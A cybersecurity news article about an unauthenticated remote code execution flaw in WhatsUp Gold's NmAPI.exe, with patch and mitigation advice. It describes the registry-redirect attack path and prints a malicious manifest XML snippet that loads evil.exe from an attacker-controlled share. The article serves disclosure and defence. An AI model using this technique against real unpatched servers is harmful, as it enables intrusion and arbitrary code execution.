Thursday, May 8, 2025
HomeCyber Security NewsProgress WhatsUp Gold RCE Vulnerability - PoC Exploit Released

Progress WhatsUp Gold RCE Vulnerability – PoC Exploit Released

Published on

SIEM as a Service

Follow Us on Google News

A registry overwrite remote code execution (RCE) vulnerability has been identified in NmAPI.exe, part of the WhatsUp Gold network monitoring software.

This vulnerability, present in versions before 24.0.1, allows an unauthenticated remote attacker to execute arbitrary code on affected systems, posing significant security risks.

Vulnerability Details

The vulnerability lies within NmAPI.exe, a Windows Communication Foundation (WCF) application utilized by WhatsUp Gold.

- Advertisement - Google News

Specifically, the flaw is found in the UpdateFailoverRegistryValues operation.

This function allows interactions with the Windows registry, enabling an attacker to write or alter registry entries without authentication.

Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar

The operation can be exploited via a netTcpBinding at the endpoint net.tcp://<target-host>:9643. By leveraging this method, attackers can modify registry values under HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\.

A key aspect of this vulnerability is the ability to change the InstallDir registry entry to point to a Universal Naming Convention (UNC) path controlled by an attacker, such as \\<attacker-ip>\share\WhatsUp.

Exploit Mechanism

Once the attacker manipulates the registry to redirect the InstallDir to an attacker-controlled network share, the stage is set for further exploitation.

When the Ipswitch Service Control Manager (ServiceControlManager.exe) service restarts—possibly triggered by a system restart or Windows update—it attempts to read various manifest files from the specified UNC path.

This action enables the attacker to define new processes to be executed by including a <ServerProcess> element in the WhatsUpPlatform-PluginManifest.xml file. For example, the attacker can specify:

<ServerProcess Id="28" Assemblyname="\\<attacker-ip>\share\evil.exe" Arguments="" EventName="XXXShutdownEvent" Description="XXX" ShutdownOrder="2">
    <NormalStartup StartupType="Automatic" StartupOrder="150" StartupDelay="2"/>
    <FailoverStartup StartupType="Manual" StartupOrder="150" StartupDelay="2"/>
</ServerProcess>

This configuration results in the automatic execution of a malicious executable (evil.exe) controlled by the attacker.

According to the Tenable report, the release of a Proof-of-Concept (PoC) exploit underscores the urgency for organizations using affected versions of WhatsUp Gold to upgrade to version 24.0.1 or later.

Failure to patch this vulnerability could lead to unauthorized access and control over systems, highlighting the importance of immediate action in securing network monitoring environments.  

Cybersecurity experts advise implementing network-level mitigations alongside the software update. This includes restricting access to TCP port 9643 to trusted hosts and continuously monitoring for any suspicious registry modifications.

As always, maintaining up-to-date backups and implementing comprehensive intrusion detection systems are essential components of a robust security posture.

Analyse Advanced Malware & Phishing Analysis With ANY.RUN Black Friday Deals : Get up to 3 Free Licenses.

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector...

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its...

SpyCloud Analysis Reveals 94% of Fortune 50 Companies Have Employee Data Exposed in Phishing Attacks

SpyCloud, the leading identity threat protection company, today released an analysis of nearly 6...

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector...

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its...

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect...